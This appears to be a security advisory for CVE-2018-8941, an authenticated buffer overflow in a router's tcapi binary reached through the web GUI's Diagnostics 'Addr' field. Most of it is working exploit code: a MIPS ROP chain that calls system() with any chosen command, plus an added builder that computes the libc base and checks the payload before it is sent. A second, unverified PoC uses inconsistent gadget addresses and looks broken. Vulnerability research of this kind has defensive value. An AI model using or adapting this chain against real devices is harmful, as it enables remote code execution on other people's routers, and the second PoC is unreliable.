Adam Simuntis :: https://twitter.com/adamsimuntis
Mindaugas Slusnys :: https://twitter.com/mislusnys
The buffer overflow vulnerability is in the "/userfs/bin/tcapi" binary, which the Web GUI uses as a wrapper for its "Diagnostics" functionality.
An authenticated user can pass a long buffer as the 'Addr' parameter to '/userfs/bin/tcapi' through its 'set Diagnostics_Entry' function and cause memory corruption. It is further possible to redirect the program's control flow and execute arbitrary code.
Vulnerability PoC
https://github.com/SECFORCE/CVE-2018-8941
Executing 'system("reboot;")' is done with the following chain (Python 3; the original was Python 2 string code, so the padding and command are now bytes):

```python
import struct

# Since we are exploiting through the Web GUI, the process mappings
# (/proc/`pidof boa`/maps) were obtained from the '/userfs/bin/boa' binary.
libc_base = 0x2b02b000

# 0x59bb0 is the offset of system() in libc; addresses are packed big-endian.
libc_system = struct.pack(">I", libc_base + 0x59bb0)

# Padding up to the saved-register area of tcapi's stack frame.
rop_pad = b'A' * 580

# 3rd: jump to system() from libc; $a0 contains the argument.
s0 = libc_system

# 2nd: copy the stored command pointer from $a1 to $a0, then jump to the
#      next gadget at $s0 -> system(cmd)
# .text:00041980 move $a0, $a1
# .text:00041984 li   $a2, 0xC
# .text:00041988 move $t9, $s0
# .text:0004198C jalr $t9 ; memset
s1 = struct.pack(">I", libc_base + 0x41980)
s2 = b'BBBB'  # filler for the saved $s2 slot
s3 = b'CCCC'  # filler for the saved $s3 slot

# 1st: load the address of the command stored on the stack at ($sp+0x168)
#      into $a1, then jump to the next gadget at $s1
# .text:0000C654 addiu $a1, $sp, 0x168+var_150
# .text:0000C658 move  $t9, $s1
# .text:0000C65C jalr  $t9 ; stat64
ra = struct.pack(">I", libc_base + 0xC654)

# The command is repeated so the shell still gets a valid command list even
# if stack garbage follows it.
payload = rop_pad + s0 + s1 + s2 + s3 + ra + b"reboot;" * 10
```
To run a different command, replace the command string at the end of the payload:

```python
payload = rop_pad + s0 + s1 + s2 + s3 + ra + b"reboot;" * 10
```
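The chain above hard-codes one libc base and one command. The following is an added example, not code from the SECFORCE advisory or the linked repository: it turns the PoC into a small builder that derives the libc base from a `/proc/<pid>/maps` excerpt, assembles the same five saved-register slots, and checks the result for the two things that silently break this kind of chain before it is sent: NUL bytes (the `Addr` value is assumed to be handled as a C string, so a NUL truncates it) and gadget or function addresses that are not 4-byte aligned on MIPS. The maps excerpt, the `libc.so.0` file name and the slot names are constructed for illustration; the offsets 0x59BB0, 0x41980 and 0xC654 and the 580-byte padding are those from the PoC.

```python
import struct

# Offsets inside the device's libc, taken from the PoC above. Only the libc
# base changes between processes; these stay fixed for that libc build.
SYSTEM_OFF = 0x59BB0    # system()
GADGET1_OFF = 0xC654    # addiu $a1,$sp,0x168+var_150 ; move $t9,$s1 ; jalr $t9
GADGET2_OFF = 0x41980   # move $a0,$a1 ; li $a2,0xC ; move $t9,$s0 ; jalr $t9
PAD_LEN = 580           # bytes from the start of 'Addr' to the saved $s0 slot

# Saved-register slots in the order the PoC overwrites them.
SLOTS = ("s0", "s1", "s2", "s3", "ra")


def p32be(value):
    """Pack a 32-bit value big-endian (MIPS BE, as in the PoC)."""
    return struct.pack(">I", value & 0xFFFFFFFF)


def libc_base_from_maps(maps_text, libname="libc"):
    """Return the start of the first executable mapping whose file name
    begins with libname, parsed from /proc/<pid>/maps text."""
    for line in maps_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or "x" not in parts[1]:
            continue
        if not parts[5].rsplit("/", 1)[-1].startswith(libname):
            continue
        start, _ = parts[0].split("-")
        return int(start, 16)
    raise ValueError("no executable mapping for %r" % libname)


def build_payload(libc_base, cmd, filler=b"A", s2=b"BBBB", s3=b"CCCC"):
    """Assemble the chain: $ra -> gadget1 ($a1 = &cmd on the stack),
    $s1 -> gadget2 ($a0 = $a1), $s0 -> system(cmd)."""
    if isinstance(cmd, str):
        cmd = cmd.encode()
    chain = {
        "s0": p32be(libc_base + SYSTEM_OFF),
        "s1": p32be(libc_base + GADGET2_OFF),
        "s2": s2,
        "s3": s3,
        "ra": p32be(libc_base + GADGET1_OFF),
    }
    return filler * PAD_LEN + b"".join(chain[s] for s in SLOTS) + cmd


def layout(payload):
    """Map each slot to (offset, value) so the overwrite can be compared
    against the registers seen in the crash frame before firing."""
    out = {}
    for i, name in enumerate(SLOTS):
        off = PAD_LEN + 4 * i
        out[name] = (off, struct.unpack(">I", payload[off:off + 4])[0])
    cmd_off = PAD_LEN + 4 * len(SLOTS)
    out["cmd"] = (cmd_off, payload[cmd_off:])
    return out


def check_payload(payload, bad=b"\x00"):
    """List reasons the chain cannot survive delivery: a bad byte (NUL by
    default, since the parameter is assumed to travel as a C string) or a
    code address that is not 4-byte aligned as MIPS requires."""
    problems = []
    for b in bad:
        if bytes([b]) in payload:
            problems.append("bad byte 0x%02x in payload" % b)
    lay = layout(payload)
    for name in ("s0", "s1", "ra"):
        _, val = lay[name]
        if val % 4:
            problems.append("%s=0x%08x is not 4-byte aligned" % (name, val))
    return problems


# Constructed /proc/<pid>/maps excerpt for illustration only; the real file on
# the device differs (library names, addresses, number of mappings).
SAMPLE_MAPS = """\
00400000-00460000 r-xp 00000000 1f:02 123 /userfs/bin/boa
2b000000-2b016000 r-xp 00000000 1f:02 45  /lib/ld-uClibc.so.0
2b02b000-2b0a0000 r-xp 00000000 1f:02 46  /lib/libc.so.0
2b0af000-2b0b0000 rw-p 00074000 1f:02 46  /lib/libc.so.0
"""

if __name__ == "__main__":
    base = libc_base_from_maps(SAMPLE_MAPS)
    pl = build_payload(base, b"reboot;" * 10)
    for name, (off, val) in layout(pl).items():
        print(name, hex(off), val if name == "cmd" else hex(val))
    print("problems:", check_payload(pl) or "none")
```

With the PoC's base of 0x2b02b000 every address comes out NUL-free and aligned; rebasing libc to, say, 0x2b000000 would put a 0x00 byte into the gadget1 address, which `check_payload` reports rather than letting the truncated string reach the target.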
PoC 2 (not yet verified)

```python
#!/usr/bin/env python
# PoC 2: run 'ls'. Not yet verified. The libc base differs from PoC 1;
# system() is still at base+0x59BB0, but the gadget1 address is at
# base+0x1656C rather than base+0xC654, so this chain does not target the
# same libc layout as PoC 1.
import struct

libc = 0x40868000
s0 = struct.pack(">I", 0x408C1BB0)  # system (libc + 0x59BB0)
s1 = struct.pack(">I", 0x41414141)  # unused
s2 = struct.pack(">I", 0x43434343)  # unused
s3 = struct.pack(">I", 0x44444444)  # unused
ra = struct.pack(">I", 0x4087E56C)  # gadget1 (libc + 0x1656C)
x = b"A" * 580 + s0 + s1 + s2 + s3 + ra + b"x" * 16 + b"ls"
```